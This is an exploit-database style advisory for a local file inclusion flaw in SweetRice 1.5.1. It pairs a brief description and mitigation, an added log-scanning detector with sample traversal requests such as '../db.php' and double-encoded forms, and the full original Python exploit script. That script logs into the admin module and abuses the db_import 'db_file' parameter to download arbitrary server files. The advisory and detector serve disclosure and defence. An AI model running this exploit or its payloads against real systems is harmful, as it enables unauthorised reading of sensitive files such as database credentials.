Vendor: SweetRice
By: Ashiyane Digital Security Team
CVSS: 8,8 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: SweetRice
Affected Version From: 1.5.1
Affected Version To: 1.5.1
Patch Exists: NO
Related CWE: N/A
CPE: a:basic-cms:sweetrice:1.5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WebApp - PHP - Mysql
2016

SweetRice 1.5.1 – Local File Inclusion

SweetRice 1.5.1 is vulnerable to Local File Inclusion (LFI). An attacker can exploit this vulnerability to gain access to sensitive files on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'file' parameter in the '_get_file' action of the 'plugin' parameter in the 'as' module. An attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to download arbitrary files from the server.

Mitigation:

To mitigate this vulnerability, the application should validate and sanitize user-supplied input before using it.
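
Added example (not part of the original advisory or of the Exploit-DB script): with no patch available, a log check for traversal sequences in the parameters named on this page, including percent-encoded and double-encoded forms. The sample log lines, IP addresses, the file name backup_20161101.sql and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameter names taken from this page: 'db_file' (request in the script)
# and 'file' (named in the description). Everything else is an assumption.
WATCHED_PARAMS = {"db_file", "file"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# '..' as a whole path segment, with either slash style
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Nov/2016:10:00:01 +0000] "GET /as/?type=data&mode=db_import&db_file=../db.php&form_mode=save HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Nov/2016:10:00:05 +0000] "GET /as/?type=data&mode=db_import&db_file=%252e%252e%252fdb.php&form_mode=save HTTP/1.1" 200 512',
    '198.51.100.4 - - [03/Nov/2016:10:02:11 +0000] "GET /as/?type=data&mode=db_import&db_file=backup_20161101.sql&form_mode=save HTTP/1.1" 200 2048',
    '198.51.100.4 - - [03/Nov/2016:10:03:40 +0000] "GET /index.php?file=../notes HTTP/1.1" 404 0',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    return bool(TRAVERSAL_RE.search(fully_decode(value)))

def find_traversal(log_lines):
    """Return (line_number, parameter, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if "/as/" not in url.path + "/":
            continue  # only the 'as' module described on this page
        query = parse_qs(url.query, keep_blank_values=True)  # decodes once
        for param in sorted(WATCHED_PARAMS.intersection(query)):
            for value in query[param]:
                if has_traversal(value):
                    hits.append((number, param, fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print("line %d: %s=%r" % hit)
```

Both requests return HTTP 200 in the sample, so the status code alone does not separate a blocked attempt from a successful read; response size and the authenticated session behind the request are the next things to check.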

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

# Clear the terminal before printing the banner
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                    |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Local File Inclusion                            |
|    > Script Cod3r : Ehsan Hosseini                                    |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")

userinfo = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}

with session() as r:
    # Sign in to the admin ('as') module; the later request needs this session
    login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if success in login.text:
            print("[+] Login Successfully...")
        else:
            print("[-] User or Pass is incorrect...")
            print("Good Bye...")
            exit()
    # The db_file value is passed to the db_import handler without sanitization
    dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')

    if dlfile.status_code == 200:
        print('[+] Exploit...')
        # Write the response body to the local file named by the user
        with open(xplfile, "w") as file:
            file.write(dlfile.text)
        print('[+] File Saved...')
        print('[+] Exploit By Ehsan Hosseini')
    else:
        print("[-] Error in Exploiting...")